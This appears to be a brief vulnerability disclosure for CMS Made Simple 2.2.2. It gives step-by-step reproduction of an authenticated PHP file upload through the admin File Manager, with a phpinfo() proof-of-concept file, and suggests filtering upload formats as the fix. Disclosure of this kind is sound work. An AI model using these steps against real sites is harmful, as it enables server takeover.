upload vulnerability exists in the CMS Made Simple (CMSMS) 2.2.2

Released: 07.08.2017
CMS Made Simple (CMSMS) 2.2.2 allows remote authenticated administrators to upload PHP files,and an attacker can obtain server privileges.

step 1

http://localhost/admin/login.php
Login administrator account

step 2 ##

File Manager
http://localhost/admin/moduleinterface.php?mact=FileManager,m1_,defaultadmin,0&sk=020181698d12d069885

upload the help.php

<?php
    phpinfo();
?>



step 3 ##

Visit this web page
http://localhost//help.php

Fix bug ##

1.Filter upload file format